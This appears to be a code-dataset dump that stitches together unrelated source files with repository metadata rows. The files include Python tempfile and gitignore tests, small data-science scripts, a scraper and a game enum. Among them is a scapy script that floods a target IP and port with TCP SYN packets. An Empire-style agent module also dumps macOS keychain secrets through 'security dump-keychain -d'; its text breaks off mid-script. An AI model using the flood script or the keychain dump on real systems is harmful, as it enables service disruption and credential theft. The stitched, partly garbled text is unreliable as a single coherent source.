            self.assertFalse(isinstance(filename, str) and os.path.exists(filename),
                             "SpooledTemporaryFile %s exists after close" % filename)
        finally:
            os.rmdir(dir)

    def test_rewrite_small(self):
        # A SpooledTemporaryFile can be written to multiple within the max_size
        f = self.do_create(max_size=30)
        self.assertFalse(f._rolled)
        for i in range(5):
            f.seek(0, 0)
            f.write(b'x' * 20)
        self.assertFalse(f._rolled)

    def test_write_sequential(self):
        # A SpooledTemporaryFile should hold exactly max_size bytes, and roll
        # over afterward
        f = self.do_create(max_size=30)
        self.assertFalse(f._rolled)
        f.write(b'x' * 20)
        self.assertFalse(f._rolled)
        f.write(b'x' * 10)
        self.assertFalse(f._rolled)
        f.write(b'x')
        self.assertTrue(f._rolled)

    def test_writelines(self):
        # Verify writelines with a SpooledTemporaryFile
        f = self.do_create()
        f.writelines((b'x', b'y', b'z'))
        f.seek(0)
        buf = f.read()
        self.assertEqual(buf, b'xyz')

    def test_writelines_sequential(self):
        # A SpooledTemporaryFile should hold exactly max_size bytes, and roll
        # over afterward
        f = self.do_create(max_size=35)
        f.writelines((b'x' * 20, b'x' * 10, b'x' * 5))
        self.assertFalse(f._rolled)
        f.write(b'x')
        self.assertTrue(f._rolled)

    def test_sparse(self):
        # A SpooledTemporaryFile that is written late in the file will extend
        # when that occurs
        f = self.do_create(max_size=30)
        self.assertFalse(f._rolled)
        f.seek(100, 0)
        self.assertFalse(f._rolled)
        f.write(b'x')
        self.assertTrue(f._rolled)

    def test_fileno(self):
        # A SpooledTemporaryFile should roll over to a real file on fileno()
        # (only a real OS file has a descriptor).
        f = self.do_create(max_size=30)
        self.assertFalse(f._rolled)
        self.assertTrue(f.fileno() > 0)
        self.assertTrue(f._rolled)

    def test_multiple_close_before_rollover(self):
        # A SpooledTemporaryFile can be closed many times without error
        f = tempfile.SpooledTemporaryFile()
        f.write(b'abc\n')
        self.assertFalse(f._rolled)
        f.close()
        f.close()
        f.close()

    def test_multiple_close_after_rollover(self):
        # A SpooledTemporaryFile can be closed many times without error
        f = tempfile.SpooledTemporaryFile(max_size=1)
        f.write(b'abc\n')
        self.assertTrue(f._rolled)
        f.close()
        f.close()
        f.close()

    def test_bound_methods(self):
        # It should be OK to steal a bound method from a SpooledTemporaryFile
        # and use it independently; when the file rolls over, those bound
        # methods should continue to function
        f = self.do_create(max_size=30)
        read = f.read
        write = f.write
        seek = f.seek

        write(b"a" * 35)
        write(b"b" * 35)
        seek(0, 0)
        self.assertEqual(read(70), b'a'*35 + b'b'*35)

    def test_properties(self):
        # mode/name/newlines/encoding change once the file rolls over
        # from the in-memory buffer to a real binary file.
        f = tempfile.SpooledTemporaryFile(max_size=10)
        f.write(b'x' * 10)
        self.assertFalse(f._rolled)
        self.assertEqual(f.mode, 'w+b')
        self.assertIsNone(f.name)
        with self.assertRaises(AttributeError):
            f.newlines
        with self.assertRaises(AttributeError):
            f.encoding

        f.write(b'x')
        self.assertTrue(f._rolled)
        self.assertEqual(f.mode, 'rb+')
        self.assertIsNotNone(f.name)
        with self.assertRaises(AttributeError):
            f.newlines
        with self.assertRaises(AttributeError):
            f.encoding

    def test_text_mode(self):
        # Creating a SpooledTemporaryFile with a text mode should produce
        # a file object reading and writing (Unicode) text strings.
        f = tempfile.SpooledTemporaryFile(mode='w+', max_size=10)
        f.write("abc\n")
        f.seek(0)
        self.assertEqual(f.read(), "abc\n")
        f.write("def\n")
        f.seek(0)
        self.assertEqual(f.read(), "abc\ndef\n")
        self.assertFalse(f._rolled)
        self.assertEqual(f.mode, 'w+')
        self.assertIsNone(f.name)
        self.assertIsNone(f.newlines)
        self.assertIsNone(f.encoding)

        f.write("xyzzy\n")
        f.seek(0)
        self.assertEqual(f.read(), "abc\ndef\nxyzzy\n")
        # Check that Ctrl+Z doesn't truncate the file
        f.write("foo\x1abar\n")
        f.seek(0)
        self.assertEqual(f.read(), "abc\ndef\nxyzzy\nfoo\x1abar\n")
        self.assertTrue(f._rolled)
        self.assertEqual(f.mode, 'w+')
        self.assertIsNotNone(f.name)
        self.assertEqual(f.newlines, os.linesep)
        self.assertIsNotNone(f.encoding)

    def test_text_newline_and_encoding(self):
        # newline='' and an explicit encoding survive the rollover.
        f = tempfile.SpooledTemporaryFile(mode='w+', max_size=10,
                                          newline='', encoding='utf-8')
        f.write("\u039B\r\n")
        f.seek(0)
        self.assertEqual(f.read(), "\u039B\r\n")
        self.assertFalse(f._rolled)
        self.assertEqual(f.mode, 'w+')
        self.assertIsNone(f.name)
        self.assertIsNone(f.newlines)
        self.assertIsNone(f.encoding)

        f.write("\u039B" * 20 + "\r\n")
        f.seek(0)
        self.assertEqual(f.read(), "\u039B\r\n" + ("\u039B" * 20) + "\r\n")
        self.assertTrue(f._rolled)
        self.assertEqual(f.mode, 'w+')
        self.assertIsNotNone(f.name)
        self.assertIsNotNone(f.newlines)
        self.assertEqual(f.encoding, 'utf-8')

    def test_context_manager_before_rollover(self):
        # A SpooledTemporaryFile can be used as a context manager
        with tempfile.SpooledTemporaryFile(max_size=1) as f:
            self.assertFalse(f._rolled)
            self.assertFalse(f.closed)
        self.assertTrue(f.closed)
        def use_closed():
            with f:
                pass
        self.assertRaises(ValueError, use_closed)

    def test_context_manager_during_rollover(self):
        # A SpooledTemporaryFile can be used as a context manager
        with tempfile.SpooledTemporaryFile(max_size=1) as f:
            self.assertFalse(f._rolled)
            f.write(b'abc\n')
            f.flush()
            self.assertTrue(f._rolled)
            self.assertFalse(f.closed)
        self.assertTrue(f.closed)
        def use_closed():
            with f:
                pass
        self.assertRaises(ValueError, use_closed)

    def test_context_manager_after_rollover(self):
        # A SpooledTemporaryFile can be used as a context manager
        f = tempfile.SpooledTemporaryFile(max_size=1)
        f.write(b'abc\n')
        f.flush()
        self.assertTrue(f._rolled)
        with f:
            self.assertFalse(f.closed)
        self.assertTrue(f.closed)
        def use_closed():
            with f:
                pass
        self.assertRaises(ValueError, use_closed)

    def test_truncate_with_size_parameter(self):
        # A SpooledTemporaryFile can be truncated to zero size
        f = tempfile.SpooledTemporaryFile(max_size=10)
        f.write(b'abcdefg\n')
        f.seek(0)
        f.truncate()
        self.assertFalse(f._rolled)
        self.assertEqual(f._file.getvalue(), b'')
        # A SpooledTemporaryFile can be truncated to a specific size
        f = tempfile.SpooledTemporaryFile(max_size=10)
        f.write(b'abcdefg\n')
        f.truncate(4)
        self.assertFalse(f._rolled)
        self.assertEqual(f._file.getvalue(), b'abcd')
        # A SpooledTemporaryFile rolls over if truncated to large size
        f = tempfile.SpooledTemporaryFile(max_size=10)
        f.write(b'abcdefg\n')
        f.truncate(20)
        self.assertTrue(f._rolled)
        if has_stat:
            self.assertEqual(os.fstat(f.fileno()).st_size, 20)
# On platforms where TemporaryFile is merely an alias for
# NamedTemporaryFile, these tests would be redundant, so the class is
# only defined when the two are distinct.
if tempfile.NamedTemporaryFile is not tempfile.TemporaryFile:

    class TestTemporaryFile(BaseTestCase):
        """Test TemporaryFile()."""

        def test_basic(self):
            # TemporaryFile can create files
            # No point in testing the name params - the file has no name.
            tempfile.TemporaryFile()

        def test_has_no_name(self):
            # TemporaryFile creates files with no names (on this system)
            dir = tempfile.mkdtemp()
            f = tempfile.TemporaryFile(dir=dir)
            f.write(b'blat')

            # Sneaky: because this file has no name, it should not prevent
            # us from removing the directory it was created in.
            try:
                os.rmdir(dir)
            except:
                # cleanup
                f.close()
                os.rmdir(dir)
                raise

        def test_multiple_close(self):
            # A TemporaryFile can be closed many times without error
            f = tempfile.TemporaryFile()
            f.write(b'abc\n')
            f.close()
            f.close()
            f.close()

        # How to test the mode and bufsize parameters?
        def test_mode_and_encoding(self):
            # TemporaryFile honours the requested mode/encoding/newline.
            def roundtrip(input, *args, **kwargs):
                with tempfile.TemporaryFile(*args, **kwargs) as fileobj:
                    fileobj.write(input)
                    fileobj.seek(0)
                    self.assertEqual(input, fileobj.read())

            roundtrip(b"1234", "w+b")
            roundtrip("abdc\n", "w+")
            roundtrip("\u039B", "w+", encoding="utf-16")
            roundtrip("foo\r\n", "w+", newline="")
# Helper for test_del_on_shutdown
class NulledModules:
    """Context manager that blanks every global of the given modules on
    entry and restores the saved contents on exit."""

    def __init__(self, *modules):
        self.refs = [mod.__dict__ for mod in modules]
        self.contents = [ref.copy() for ref in self.refs]

    def __enter__(self):
        for namespace in self.refs:
            # Overwrite every existing key with None in one pass.
            namespace.update(dict.fromkeys(namespace, None))

    def __exit__(self, *exc_info):
        for namespace, saved in zip(self.refs, self.contents):
            namespace.clear()
            namespace.update(saved)
class TestTemporaryDirectory(BaseTestCase):
    """Test TemporaryDirectory()."""

    def do_create(self, dir=None, pre="", suf="", recurse=1):
        # Create a TemporaryDirectory populated with one file and,
        # optionally, ``recurse`` levels of nested temp directories.
        if dir is None:
            dir = tempfile.gettempdir()
        tmp = tempfile.TemporaryDirectory(dir=dir, prefix=pre, suffix=suf)
        self.nameCheck(tmp.name, dir, pre, suf)
        # Create a subdirectory and some files
        if recurse:
            d1 = self.do_create(tmp.name, pre, suf, recurse-1)
            # Disarm the nested object's finalizer: cleanup of the outer
            # directory must be what removes the nested contents.
            d1.name = None
        with open(os.path.join(tmp.name, "test.txt"), "wb") as f:
            f.write(b"Hello world!")
        return tmp

    def test_mkdtemp_failure(self):
        # Check no additional exception if mkdtemp fails
        # Previously would raise AttributeError instead
        # (noted as part of Issue #10188)
        with tempfile.TemporaryDirectory() as nonexistent:
            pass
        with self.assertRaises(FileNotFoundError) as cm:
            tempfile.TemporaryDirectory(dir=nonexistent)
        self.assertEqual(cm.exception.errno, errno.ENOENT)

    def test_explicit_cleanup(self):
        # A TemporaryDirectory is deleted when cleaned up
        dir = tempfile.mkdtemp()
        try:
            d = self.do_create(dir=dir)
            self.assertTrue(os.path.exists(d.name),
                            "TemporaryDirectory %s does not exist" % d.name)
            d.cleanup()
            self.assertFalse(os.path.exists(d.name),
                             "TemporaryDirectory %s exists after cleanup" % d.name)
        finally:
            os.rmdir(dir)

    @support.skip_unless_symlink
    def test_cleanup_with_symlink_to_a_directory(self):
        # cleanup() should not follow symlinks to directories (issue #12464)
        d1 = self.do_create()
        d2 = self.do_create(recurse=0)

        # Symlink d1/foo -> d2
        os.symlink(d2.name, os.path.join(d1.name, "foo"))

        # This call to cleanup() should not follow the "foo" symlink
        d1.cleanup()

        self.assertFalse(os.path.exists(d1.name),
                         "TemporaryDirectory %s exists after cleanup" % d1.name)
        self.assertTrue(os.path.exists(d2.name),
                        "Directory pointed to by a symlink was deleted")
        self.assertEqual(os.listdir(d2.name), ['test.txt'],
                         "Contents of the directory pointed to by a symlink "
                         "were deleted")
        d2.cleanup()

    @support.cpython_only
    def test_del_on_collection(self):
        # A TemporaryDirectory is deleted when garbage collected
        dir = tempfile.mkdtemp()
        try:
            d = self.do_create(dir=dir)
            name = d.name
            del d # Rely on refcounting to invoke __del__
            self.assertFalse(os.path.exists(name),
                             "TemporaryDirectory %s exists after __del__" % name)
        finally:
            os.rmdir(dir)

    def test_del_on_shutdown(self):
        # A TemporaryDirectory may be cleaned up during shutdown
        # Run a child interpreter that parks a TemporaryDirectory on one
        # module's globals, and verify the directory is removed (with a
        # ResourceWarning) when that interpreter exits.
        with self.do_create() as dir:
            for mod in ('builtins', 'os', 'shutil', 'sys', 'tempfile', 'warnings'):
                code = """if True:
                    import builtins
                    import os
                    import shutil
                    import sys
                    import tempfile
                    import warnings

                    tmp = tempfile.TemporaryDirectory(dir={dir!r})
                    sys.stdout.buffer.write(tmp.name.encode())

                    tmp2 = os.path.join(tmp.name, 'test_dir')
                    os.mkdir(tmp2)
                    with open(os.path.join(tmp2, "test.txt"), "w") as f:
                        f.write("Hello world!")

                    {mod}.tmp = tmp

                    warnings.filterwarnings("always", category=ResourceWarning)
                    """.format(dir=dir, mod=mod)
                rc, out, err = script_helper.assert_python_ok("-c", code)
                tmp_name = out.decode().strip()
                self.assertFalse(os.path.exists(tmp_name),
                            "TemporaryDirectory %s exists after cleanup" % tmp_name)
                err = err.decode('utf-8', 'backslashreplace')
                self.assertNotIn("Exception ", err)
                self.assertIn("ResourceWarning: Implicitly cleaning up", err)

    def test_warnings_on_cleanup(self):
        # ResourceWarning will be triggered by __del__
        with self.do_create() as dir:
            d = self.do_create(dir=dir, recurse=3)
            name = d.name

            # Check for the resource warning
            with support.check_warnings(('Implicitly', ResourceWarning), quiet=False):
                warnings.filterwarnings("always", category=ResourceWarning)
                del d
                support.gc_collect()
            self.assertFalse(os.path.exists(name),
                             "TemporaryDirectory %s exists after __del__" % name)

    def test_multiple_close(self):
        # Can be cleaned-up many times without error
        d = self.do_create()
        d.cleanup()
        d.cleanup()
        d.cleanup()

    def test_context_manager(self):
        # Can be used as a context manager
        d = self.do_create()
        with d as name:
            self.assertTrue(os.path.exists(name))
            self.assertEqual(name, d.name)
        self.assertFalse(os.path.exists(name))
def test_main():
    # Entry point used by regrtest: run every TestCase in this module.
    support.run_unittest(__name__)
# Allow running this test file directly.
if __name__ == "__main__":
    test_main()
| [
"[email protected]"
] | |
43a04e5ac41572106ab3ff879af6d0b36c7e0e92 | c36679186f669c6e3bd1c106c96d4a17be1f5ab1 | /Data Science and Mechine Leraning/99.py | a816c6cc8a35dc07365ddd5a9e3c00881cf640da | [] | no_license | touhiduzzaman-tuhin/python-code-university-life | 60a3d671b200a6f5222c6d176c13c5f20f013509 | 6d2e3d90d430faa5c83fe79e7fb1ebe516994762 | refs/heads/master | 2023-03-22T15:18:10.636203 | 2021-03-06T18:52:04 | 2021-03-06T18:52:04 | 332,467,190 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | import numpy as np
import pandas as pd

# Raw columns; NaN marks the missing entries we want to patch over.
li = {
    'A': [1, 2, np.nan],
    'B': [1, np.nan, np.nan],
    'C': [1, 2, 3],
}
li2 = pd.DataFrame(li)
# Replace every missing cell with a placeholder string and show the result.
li3 = li2.fillna(value='FILL VALUE')
print(li3)
"[email protected]"
] | |
ccbd6d4fef4e78de38c9276cc38f6fa7330b80d5 | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /125_algorithms/_examples/_algorithms_challenges/pybites/intermediate/097_beautifulsoup_ii_scrape_us_holidays/save1_passed.py | 23b546430bed3f5a69c3ef251e95a5ae2acb06fc | [] | no_license | syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 | Python | UTF-8 | Python | false | false | 1,037 | py | from collections import defaultdict
import os
# Restored: the original import/call were garbled in this copy
# ("from u__.r.. import u.." / "u..(").
from urllib.request import urlretrieve

from bs4 import BeautifulSoup

# prep data
tmp = os.getenv("TMP", "/tmp")
page = 'us_holidays.html'
holidays_page = os.path.join(tmp, page)
# Download once; skip the network round-trip when the page is cached.
if not os.path.isfile(holidays_page):
    urlretrieve(
        f'https://bites-data.s3.us-east-2.amazonaws.com/{page}',
        holidays_page
    )

with open(holidays_page) as f:
    content = f.read()

# Month ("MM") -> list of holiday names; filled by get_us_bank_holidays.
holidays = defaultdict(list)
def get_us_bank_holidays(content=content):
    """Parse the scraped HTML and return the module-level ``holidays``
    dict, mapping month strings ("MM") to lists of bank holiday names
    taken from the table with CSS class ``list-table``."""
    soup = BeautifulSoup(content, 'html.parser')
    table = soup.find('table', class_='list-table')
    # Month numbers come from the <time> cells, names from the <a> links.
    months = [cell.text[5:7] for cell in table.findAll('time')]
    names = [link.text.strip() for link in table.findAll('a')]
    for month, name in zip(months, names):
        holidays[month].append(name)
    return holidays
"[email protected]"
] | |
bb02dddbd6ef8c599eda31ca5a6d7365c3f4b787 | 636ba2700eaf3a151b73144b510f38c75ab1919d | /ml/m11_kfold_estimators2_cancer.py | 83c224be41b0db487d18733b67d449cc86ebf928 | [] | no_license | Taerimmm/ML | 17997f388e18c28dfd9de83af98a6d4bebe7e1f0 | 6147cede81ebcc95f21adebf75731fbbb11edfab | refs/heads/master | 2023-06-10T14:26:45.335219 | 2021-07-05T15:30:47 | 2021-07-05T15:30:47 | 324,874,959 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,070 | py | from sklearn.model_selection import train_test_split, KFold, cross_val_score
from sklearn.metrics import accuracy_score
from sklearn.utils import all_estimators
from sklearn.datasets import load_breast_cancer

import warnings
warnings.filterwarnings('ignore')

# Binary classification dataset: breast cancer diagnosis.
dataset = load_breast_cancer()

x = dataset.data
y = dataset.target

x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=44)

# 5-fold cross-validation with shuffled splits.
kfold = KFold(n_splits=5, shuffle=True)

import sklearn
print(sklearn.__version__) # 0.23.2
# all_estimators is tuned for scikit-learn 0.20.
allAlgorithms = all_estimators(type_filter='classifier') # every classifier model in sklearn
# print(allAlgorithms)

for (name, algorithm) in allAlgorithms:
    try :
        model = algorithm()

        scores = cross_val_score(model, x_train, y_train, cv=kfold) # cv=5 also works / in that case shuffle=False
        print(name, '의 정답율 :\n', scores)
    except :
        # continue
        print(name, '은 없는 놈') # an algorithm missing in 0.23.2

# These scores can serve as a baseline metric.
| [
"[email protected]"
] | |
1ced1e5bd8b38f823f7c72e74c340613a4c11f63 | a9c0daa4a7b9a4d7341afcab270c5b5debb8c13f | /env/lib/python3.6/site-packages/pathspec/tests/test_gitignore.py | af1ee7a82daa8a6f90fb940d7c15e127faf3eb7e | [] | no_license | phamcong/alienator-plf | bad8c4e003fd189c43243b31ef2b975b6f154754 | ea65628af66fbca51f2248ceb4ba93f858dbddce | refs/heads/master | 2022-11-26T01:28:38.286261 | 2017-11-07T15:12:08 | 2017-11-07T15:12:08 | 109,412,097 | 0 | 1 | null | 2020-07-25T23:43:17 | 2017-11-03T15:30:22 | JavaScript | UTF-8 | Python | false | false | 5,066 | py | # encoding: utf-8
"""
This script tests ``GitIgnorePattern``.
"""
import unittest
import pathspec.util
from pathspec import GitIgnorePattern
class GitIgnoreTest(unittest.TestCase):
    """
    The ``GitIgnoreTest`` class tests the ``GitIgnorePattern``
    implementation.

    Each test asserts two things: the pattern's ``include`` flag
    (None = no-op, True = match, False = negated match) and the exact
    regular expression the gitignore pattern is translated to.
    """

    def test_00_empty(self):
        """
        Tests an empty pattern.
        """
        spec = GitIgnorePattern('')
        self.assertIsNone(spec.include)
        self.assertIsNone(spec.regex)

    def test_01_absolute_root(self):
        """
        Tests a single root absolute path pattern.

        This should NOT match any file (according to git check-ignore (v2.4.1)).
        """
        spec = GitIgnorePattern('/')
        self.assertIsNone(spec.include)
        self.assertIsNone(spec.regex)

    def test_01_absolute(self):
        """
        Tests an absolute path pattern.

        This should match:
            an/absolute/file/path
            an/absolute/file/path/foo

        This should NOT match:
            foo/an/absolute/file/path
        """
        spec = GitIgnorePattern('/an/absolute/file/path')
        self.assertTrue(spec.include)
        self.assertEqual(spec.regex.pattern, '^an/absolute/file/path(?:/.*)?$')

    def test_01_relative(self):
        """
        Tests a relative path pattern.

        This should match:
            spam
            spam/
            foo/spam
            spam/foo
            foo/spam/bar
        """
        spec = GitIgnorePattern('spam')
        self.assertTrue(spec.include)
        self.assertEqual(spec.regex.pattern, '^(?:.+/)?spam(?:/.*)?$')

    def test_01_relative_nested(self):
        """
        Tests a relative nested path pattern.

        This should match:
            foo/spam
            foo/spam/bar

        This should **not** match (according to git check-ignore (v2.4.1)):
            bar/foo/spam
        """
        spec = GitIgnorePattern('foo/spam')
        self.assertTrue(spec.include)
        self.assertEqual(spec.regex.pattern, '^foo/spam(?:/.*)?$')

    def test_02_comment(self):
        """
        Tests a comment pattern.
        """
        spec = GitIgnorePattern('# Cork soakers.')
        self.assertIsNone(spec.include)
        self.assertIsNone(spec.regex)

    def test_02_ignore(self):
        """
        Tests an exclude pattern.

        This should NOT match (according to git check-ignore (v2.4.1)):
            temp/foo
        """
        # A leading '!' negates the pattern: include is False, not None.
        spec = GitIgnorePattern('!temp')
        self.assertIsNotNone(spec.include)
        self.assertFalse(spec.include)
        self.assertEqual(spec.regex.pattern, '^(?:.+/)?temp$')

    def test_03_child_double_asterisk(self):
        """
        Tests a directory name with a double-asterisk child
        directory.

        This should match:
            spam/bar

        This should **not** match (according to git check-ignore (v2.4.1)):
            foo/spam/bar
        """
        spec = GitIgnorePattern('spam/**')
        self.assertTrue(spec.include)
        self.assertEqual(spec.regex.pattern, '^spam/.*$')

    def test_03_inner_double_asterisk(self):
        """
        Tests a path with an inner double-asterisk directory.

        This should match:
            left/bar/right
            left/foo/bar/right
            left/bar/right/foo

        This should **not** match (according to git check-ignore (v2.4.1)):
            foo/left/bar/right
        """
        spec = GitIgnorePattern('left/**/right')
        self.assertTrue(spec.include)
        self.assertEqual(spec.regex.pattern, '^left(?:/.+)?/right(?:/.*)?$')

    def test_03_only_double_asterisk(self):
        """
        Tests a double-asterisk pattern which matches everything.
        """
        spec = GitIgnorePattern('**')
        self.assertTrue(spec.include)
        self.assertEqual(spec.regex.pattern, '^.+$')

    def test_03_parent_double_asterisk(self):
        """
        Tests a file name with a double-asterisk parent directory.

        This should match:
            foo/spam
            foo/spam/bar
        """
        spec = GitIgnorePattern('**/spam')
        self.assertTrue(spec.include)
        self.assertEqual(spec.regex.pattern, '^(?:.+/)?spam(?:/.*)?$')

    def test_04_infix_wildcard(self):
        """
        Tests a pattern with an infix wildcard.

        This should match:
            foo--bar
            foo-hello-bar
            a/foo-hello-bar
            foo-hello-bar/b
            a/foo-hello-bar/b
        """
        spec = GitIgnorePattern('foo-*-bar')
        self.assertTrue(spec.include)
        self.assertEqual(spec.regex.pattern, '^(?:.+/)?foo\\-[^/]*\\-bar(?:/.*)?$')

    def test_04_postfix_wildcard(self):
        """
        Tests a pattern with a postfix wildcard.

        This should match:
            ~temp-
            ~temp-foo
            ~temp-foo/bar
            foo/~temp-bar
            foo/~temp-bar/baz
        """
        spec = GitIgnorePattern('~temp-*')
        self.assertTrue(spec.include)
        self.assertEqual(spec.regex.pattern, '^(?:.+/)?\\~temp\\-[^/]*(?:/.*)?$')

    def test_04_prefix_wildcard(self):
        """
        Tests a pattern with a prefix wildcard.

        This should match:
            bar.py
            bar.py/
            foo/bar.py
            foo/bar.py/baz
        """
        spec = GitIgnorePattern('*.py')
        self.assertTrue(spec.include)
        self.assertEqual(spec.regex.pattern, '^(?:.+/)?[^/]*\\.py(?:/.*)?$')

    def test_05_directory(self):
        """
        Tests a directory pattern.

        This should match:
            dir/
            foo/dir/
            foo/dir/bar

        This should **not** match:
            dir
        """
        # A trailing slash makes the pattern match directories only.
        spec = GitIgnorePattern('dir/')
        self.assertTrue(spec.include)
        self.assertEqual(spec.regex.pattern, '^(?:.+/)?dir/.*$')

    def test_05_registered(self):
        """
        Tests that the pattern is registered.
        """
        self.assertIs(pathspec.util.lookup_pattern('gitignore'), GitIgnorePattern)
if __name__ == '__main__':
    # Build and run the suite explicitly so the module works as a script.
    loader = unittest.TestLoader()
    runner = unittest.TextTestRunner(verbosity=2)
    runner.run(loader.loadTestsFromTestCase(GitIgnoreTest))
| [
"[email protected]"
] | |
e914343fa85ca6d3f23aeda9938362687fbe0344 | 20c20938e201a0834ccf8b5f2eb5d570d407ad15 | /abc146/abc146_c/8937880.py | ee9c12a0ce700fce574a65e29313213efa3efaa3 | [] | no_license | kouhei-k/atcoder_submissions | 8e1a1fb30c38e0d443b585a27c6d134bf1af610a | 584b4fd842ccfabb16200998fe6652f018edbfc5 | refs/heads/master | 2021-07-02T21:20:05.379886 | 2021-03-01T12:52:26 | 2021-03-01T12:52:26 | 227,364,764 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 272 | py | A, B, X = map(int, input().split())
minN = 1
maxN = 10**9
ans = 0
while(1):
N = (minN + maxN) // 2
n = A*N + len(str(N))*B
if n <= X:
ans = N
if minN == maxN:
break
if n < X:
minN = N+1
else:
maxN = N
print(ans)
| [
"[email protected]"
] | |
30ac3811a3b1bd1fe781ad76f925c49dc1176111 | 84888c7f9d6d7195917053b2d14b2d30e1e5e375 | /stress_testing/tcp_syn_flood.py | 165848ca4522c0e0c341fb99281fc5f23da65896 | [] | no_license | codeandrew/offensivesecurity-python | a8d48c565d2434430e6f0e3069385b19dfbdef60 | 364ff7233c31a4a853f9ef185f96078e50c7bef4 | refs/heads/master | 2023-08-17T11:23:44.852329 | 2023-08-02T14:54:37 | 2023-08-02T14:54:37 | 242,969,080 | 12 | 5 | null | 2023-09-04T16:45:25 | 2020-02-25T10:10:59 | Python | UTF-8 | Python | false | false | 628 | py | from scapy.all import *
import sys
def main(target_ip, target_port, rounds=10_000):
    """Send `rounds` TCP SYN packets, each carrying a 1 KiB payload, to
    target_ip:target_port via scapy.

    NOTE: this is a stress-testing (SYN flood) tool -- only run it against
    hosts you are authorized to test.
    """
    print(f"Target IP: {target_ip}")
    print(f"Target Port: {target_port}")
    print(f"Rounds: {rounds}")

    # Define the payload to send in the packets
    payload = "A" * 1024

    # Create a loop to send a large number of packets to the target
    for i in range(rounds):
        # flags="S" sets only the SYN flag; scapy fills in the remaining
        # IP/TCP fields (source port, sequence number, ...) with defaults.
        packet = IP(dst=target_ip) / TCP(dport=target_port, flags="S") / payload
        send(packet, verbose=False)

if __name__ == "__main__":
    # argv[1] = target IP, argv[2] = target port; no argument validation.
    target_ip = sys.argv[1]
    target_port = int(sys.argv[2])
    main(target_ip=target_ip, target_port=target_port)
| [
"[email protected]"
] | |
7c9e003239f263252fb0adea540bb5e1962cd733 | b3b68efa404a7034f0d5a1c10b281ef721f8321a | /src/sims4communitylib/enums/common_species.py | eacddcd09423a491b7c32754f111f81175abc65a | [
"Apache-2.0"
] | permissive | velocist/TS4CheatsInfo | 62195f3333076c148b2a59f926c9fb5202f1c6fb | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | refs/heads/main | 2023-03-08T01:57:39.879485 | 2021-02-13T21:27:38 | 2021-02-13T21:27:38 | 337,543,310 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,376 | py | """
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from sims.sim_info import SimInfo
from sims4communitylib.enums.enumtypes.common_int import CommonInt
class CommonSpecies(CommonInt):
    """Custom Species enum containing all species (including extended species).
    """
    INVALID: 'CommonSpecies' = 0
    HUMAN: 'CommonSpecies' = 1
    SMALL_DOG: 'CommonSpecies' = 2
    LARGE_DOG: 'CommonSpecies' = 3
    CAT: 'CommonSpecies' = 4

    @staticmethod
    def get_species(sim_info: SimInfo) -> 'CommonSpecies':
        """Retrieve the CommonSpecies of a sim. Use this instead of CommonSpeciesUtils.get_species to determine a more specific species.
        """
        from sims4communitylib.utils.sims.common_species_utils import CommonSpeciesUtils
        # Check the predicates in a fixed order; the first match wins.
        checks = (
            (CommonSpeciesUtils.is_human, CommonSpecies.HUMAN),
            (CommonSpeciesUtils.is_small_dog, CommonSpecies.SMALL_DOG),
            (CommonSpeciesUtils.is_large_dog, CommonSpecies.LARGE_DOG),
            (CommonSpeciesUtils.is_cat, CommonSpecies.CAT),
        )
        for predicate, species in checks:
            if predicate(sim_info):
                return species
        return CommonSpecies.INVALID
| [
"[email protected]"
] | |
413f0b7b9ab12d75b76ef41418717665a490a242 | d489eb7998aa09e17ce8d8aef085a65f799e6a02 | /lib/modules/python/collection/osx/keychaindump_decrypt.py | 64015ea23ade2de15835ef86ce40b32770ac9187 | [
"MIT"
] | permissive | fengjixuchui/invader | d36078bbef3d740f95930d9896b2d7dd7227474c | 68153dafbe25e7bb821c8545952d0cc15ae35a3e | refs/heads/master | 2020-07-21T19:45:10.479388 | 2019-09-26T11:32:38 | 2019-09-26T11:32:38 | 206,958,809 | 2 | 1 | MIT | 2019-09-26T11:32:39 | 2019-09-07T11:32:17 | PowerShell | UTF-8 | Python | false | false | 3,432 | py | class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Sandbox-Keychain-Dump',
# list of one or more authors for the module
'Author': ['@import-au'],
# more verbose multi-line description of the module
'Description': ("Uses Apple Security utility to dump the contents of the keychain. "
"WARNING: Will prompt user for access to each key."
"On Newer versions of Sierra and High Sierra, this will also ask the user for their password for each key."),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : "",
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': [
""
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'OutFile' : {
'Description': 'File to output AppleScript to, otherwise displayed on the screen.',
'Required': False,
'Value': ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
script = r"""
import subprocess
import re
process = subprocess.Popen('/usr/bin/security dump-keychain -d', stdout=subprocess.PIPE, shell=True)
keychain = process.communicate()
